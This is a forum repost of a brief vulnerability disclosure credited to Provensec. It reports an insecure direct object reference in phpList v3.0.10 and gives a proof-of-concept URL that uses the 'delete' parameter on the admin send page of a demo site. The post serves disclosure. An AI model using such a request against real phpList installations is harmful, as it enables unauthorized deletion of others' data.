Aerosol Posted April 2, 2015 Report Posted April 2, 2015 # Affected software: phplist# Type of vulnerability: insecure object reference# URL:phplist.com# Discovered by: Provensec# Website: http://www.provensec.com#version: phpList ltd. - v3.0.10# Proof of conceptinsecure object refrenced on page deltetationvuln param:deleteexample:http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99ref:https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29Source Quote
